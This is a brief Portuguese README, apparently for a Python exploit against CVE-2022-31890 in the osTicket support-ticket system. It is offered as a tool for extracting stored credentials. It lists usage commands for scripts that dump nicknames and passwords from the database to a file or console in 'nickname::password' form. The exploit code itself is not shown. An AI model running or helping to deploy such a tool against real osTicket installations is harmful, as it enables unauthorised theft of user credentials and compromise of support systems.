
Exploit baseado em Python para CVE-2022-31890 no sistema de tickets de suporte osTicket, permitindo extração de credenciais via scripts de enumeração de apelido e senha.
Apelido:
> python nickname.py
# A saída do primeiro apelido na tabela.
Senha:
> python password.py
# A saída da primeira senha na tabela.
Saída para arquivo:
> python dumpFile.py
> cat dump.txt || {{nickname}}::{{password}}
Saída para console:
> python dumpConsole.py
# Saída no console || {{nickname}}::{{password}}